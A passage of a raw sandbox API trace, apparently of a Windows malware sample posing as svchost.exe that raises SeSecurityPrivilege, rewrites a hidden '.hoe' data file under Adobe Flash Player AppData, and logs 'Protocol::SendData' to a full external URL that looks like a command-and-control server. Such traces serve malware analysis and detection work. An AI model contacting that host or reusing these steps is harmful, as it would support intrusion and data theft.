lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5414780, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5414150, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.918] GetSystemTime (in: lpSystemTime=0x725e3c8 | out: lpSystemTime=0x725e3c8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x148)) [0120.918] SystemTimeToFileTime (in: lpSystemTime=0x725e3c8, lpFileTime=0x725e3b8 | out: lpFileTime=0x725e3b8) returned 1 [0120.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.918] GetUserNameExW () returned 0x1 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413548, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="8A") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="00") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="00") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="00") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="B7") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="49") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="67") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="98") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="F6") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="14") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="59") returned 2 [0120.920] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="35") returned 2 [0120.921] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="AA") returned 2 [0120.921] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="3E") returned 2 [0120.921] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="27") returned 2 [0120.921] wvnsprintfW (in: pszDest=0x725e1b0, cchDest=6, pszFmt="%02X", arglist=0x725e18c | out: pszDest="60") returned 2 [0120.921] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1f8 [0120.921] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0xffffffff) returned 0x0 [0120.929] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.929] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.929] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.929] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.929] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.929] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.930] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.930] GetCurrentThread () returned 0xfffffffe [0120.930] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e414 | out: TokenHandle=0x725e414*=0x0) returned 0 [0120.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e414 | out: TokenHandle=0x725e414*=0x1cc) returned 1 [0120.930] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e41c | out: lpLuid=0x725e41c*(LowPart=0x8, HighPart=0)) returned 1 [0120.932] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x725e418*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.932] GetLastError () returned 0x0 [0120.932] CloseHandle (hObject=0x1cc) returned 1 [0120.932] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.932] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214310, lpbSaclPresent=0x725e44c, pSacl=0x725e440, lpbSaclDefaulted=0x725e448 | out: lpbSaclPresent=0x725e44c, pSacl=0x725e440, lpbSaclDefaulted=0x725e448) returned 1 [0120.932] SetNamedSecurityInfoW () returned 0x0 [0120.947] LocalFree (hMem=0x5214310) returned 0x0 [0120.947] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.948] GetCurrentThread () returned 0xfffffffe [0120.948] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e414 | out: TokenHandle=0x725e414*=0x0) returned 0 [0120.948] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e414 | out: TokenHandle=0x725e414*=0x1cc) returned 1 [0120.948] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e41c | out: lpLuid=0x725e41c*(LowPart=0x8, HighPart=0)) returned 1 [0120.949] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x725e418*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.949] GetLastError () returned 0x0 [0120.949] CloseHandle (hObject=0x1cc) returned 1 [0120.949] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.949] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52140a0, lpbSaclPresent=0x725e44c, pSacl=0x725e440, lpbSaclDefaulted=0x725e448 | out: lpbSaclPresent=0x725e44c, pSacl=0x725e440, lpbSaclDefaulted=0x725e448) returned 1 [0120.949] SetNamedSecurityInfoW () returned 0x0 [0120.951] LocalFree (hMem=0x52140a0) returned 0x0 [0120.951] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0120.952] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x725e460 | out: lpFileSize=0x725e460*=782) returned 1 [0120.952] VirtualAlloc (lpAddress=0x0, dwSize=0x30e, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0120.952] ReadFile (in: hFile=0x1cc, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x30e, lpNumberOfBytesRead=0x725e46c, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x725e46c*=0x30e, lpOverlapped=0x0) returned 1 [0120.954] CloseHandle (hObject=0x1cc) returned 1 [0120.956] wvnsprintfA (in: pszDest=0x5413488, cchDest=21, pszFmt="%d", arglist=0x725e3b0 | out: pszDest="1476366202") returned 10 [0120.963] wvnsprintfA (in: pszDest=0x5413588, cchDest=21, pszFmt="%d", arglist=0x725e3b0 | out: pszDest="1476366203") returned 10 [0120.964] wvnsprintfA (in: pszDest=0x5413588, cchDest=21, pszFmt="%d", arglist=0x725e3b0 | out: pszDest="1476366203") returned 10 [0120.968] wvnsprintfA (in: pszDest=0x5413488, cchDest=21, pszFmt="%d", arglist=0x725e3b0 | out: pszDest="1476366203") returned 10 [0120.977] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0120.987] WriteFile (in: hFile=0x1cc, lpBuffer=0x5401830*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x725e464, lpOverlapped=0x0 | out: lpBuffer=0x5401830*, lpNumberOfBytesWritten=0x725e464, lpOverlapped=0x0) returned 1 [0120.989] CloseHandle (hObject=0x1cc) returned 1 [0120.996] ReleaseMutex (hMutex=0x1f8) returned 1 [0121.008] CloseHandle (hObject=0x1f8) returned 1 [0121.008] SetLastError (dwErrCode=0x0) [0121.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="not set", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0121.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="not set", cchWideChar=7, lpMultiByteStr=0x5412148, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="not set", lpUsedDefaultChar=0x0) returned 7 [0121.009] wvnsprintfW (in: pszDest=0x725ebfc, cchDest=10, pszFmt="%u.%u.%u", arglist=0x725e86c | out: pszDest="2.2.5") returned 5 [0121.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.2.5", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.2.5", cchWideChar=5, lpMultiByteStr=0x5412158, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2.2.5", lpUsedDefaultChar=0x0) returned 5 [0121.011] GetLastError () returned 0x0 [0121.011] GetLocalTime (in: lpSystemTime=0x725e750 | out: lpSystemTime=0x725e750*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x1b0)) [0121.011] GetCurrentThreadId () returned 0xd6c [0121.011] GetCurrentProcessId () returned 0x2ec [0121.011] wvnsprintfW (in: pszDest=0x5403200, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725e6f4 | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0121.011] wvnsprintfW (in: pszDest=0x54032ac, cchDest=1962, pszFmt="Protocol::SendData %S", arglist=0x725e774 | out: pszDest="Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat") returned 80 [0121.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", cchWideChar=166, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 166 [0121.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", cchWideChar=166, lpMultiByteStr=0x54010a0, cbMultiByte=167, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", lpUsedDefaultChar=0x0) returned 166 [0121.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", cchWideChar=166, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 166 [0121.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", cchWideChar=166, lpMultiByteStr=0x54012d8, cbMultiByte=167, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0010, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Protocol::SendData https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", lpUsedDefaultChar=0x0) returned 166 [0121.012] GetSystemTime (in: lpSystemTime=0x725e340 | out: lpSystemTime=0x725e340*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x1b0)) [0121.012] SystemTimeToFileTime (in: lpSystemTime=0x725e340, lpFileTime=0x725e330 | out: lpFileTime=0x725e330) returned 1 [0121.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0121.013] GetUserNameExW () returned 0x1 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413088, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="8A") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="00") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="00") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="00") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="B7") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="49") returned 2 [0121.014] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="67") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="98") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="F6") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="14") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="59") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="35") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="AA") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="3E") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="27") returned 2 [0121.015] wvnsprintfW (in: pszDest=0x725e128, cchDest=6, pszFmt="%02X", arglist=0x725e104 | out: pszDest="60") returned 2 [0121.015] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1f8 [0121.015] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0xffffffff) returned 0x0 [0121.048] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0121.048] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0121.048] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0121.048] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0121.049] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0121.049] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0121.049] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0121.049] GetCurrentThread () returned 0xfffffffe [0121.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e38c | out: TokenHandle=0x725e38c*=0x0) returned 0 [0121.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e38c | out: TokenHandle=0x725e38c*=0x1b8) returned 1 [0121.049] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e394 | out: lpLuid=0x725e394*(LowPart=0x8, HighPart=0)) returned 1 [0121.052] AdjustTokenPrivileges (in: TokenHandle=0x1b8, DisableAllPrivileges=0, NewState=0x725e390*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.052] GetLastError () returned 0x0 [0121.052] CloseHandle (hObject=0x1b8) returned 1 [0121.052] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.052] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52140a0, lpbSaclPresent=0x725e3c4, pSacl=0x725e3b8, lpbSaclDefaulted=0x725e3c0 | out: lpbSaclPresent=0x725e3c4, pSacl=0x725e3b8, lpbSaclDefaulted=0x725e3c0) returned 1 [0121.052] SetNamedSecurityInfoW () returned 0x0 [0121.059] LocalFree (hMem=0x52140a0) returned 0x0 [0121.059] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.059] GetCurrentThread () returned 0xfffffffe [0121.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e38c | out: TokenHandle=0x725e38c*=0x0) returned 0 [0121.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e38c | out: TokenHandle=0x725e38c*=0x1b8) returned 1 [0121.059] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e394 | out: lpLuid=0x725e394*(LowPart=0x8, HighPart=0)) returned 1 [0121.060] AdjustTokenPrivileges (in: TokenHandle=0x1b8, DisableAllPrivileges=0, NewState=0x725e390*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.061] GetLastError () returned 0x0 [0121.061] CloseHandle (hObject=0x1b8) returned 1 [0121.061] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.061] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x725e3c4, pSacl=0x725e3b8, lpbSaclDefaulted=0x725e3c0 | out: lpbSaclPresent=0x725e3c4, pSacl=0x725e3b8, lpbSaclDefaulted=0x725e3c0) returned 1 [0121.061] SetNamedSecurityInfoW () returned 0x0 [0121.062] LocalFree (hMem=0x52142e0) returned 0x0 [0121.062] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0121.063] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x725e3d8 | out: lpFileSize=0x725e3d8*=1294) returned 1 [0121.063] VirtualAlloc (lpAddress=0x0, dwSize=0x50e, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.063] ReadFile (in: hFile=0x1b8, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x50e, lpNumberOfBytesRead=0x725e3e4, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x725e3e4*=0x50e, lpOverlapped=0x0) returned 1 [0121.065] CloseHandle (hObject=0x1b8) returned 1 [0121.066] wvnsprintfA (in: pszDest=0x5413968, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366202") returned 10 [0121.067] wvnsprintfA (in: pszDest=0x5413888, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366203") returned 10 [0121.068] wvnsprintfA (in: pszDest=0x54139c8, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366203") returned 10 [0121.069] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366203") returned 10 [0121.070] wvnsprintfA (in: pszDest=0x5413888, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366203") returned 10 [0121.074] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x725e328 | out: pszDest="1476366203") returned 10 [0121.075] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0121.080] WriteFile (in: hFile=0x1b8, lpBuffer=0x5404210*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x725e3dc, lpOverlapped=0x0 | out: lpBuffer=0x5404210*, lpNumberOfBytesWritten=0x725e3dc, lpOverlapped=0x0) returned 1 [0121.081] CloseHandle 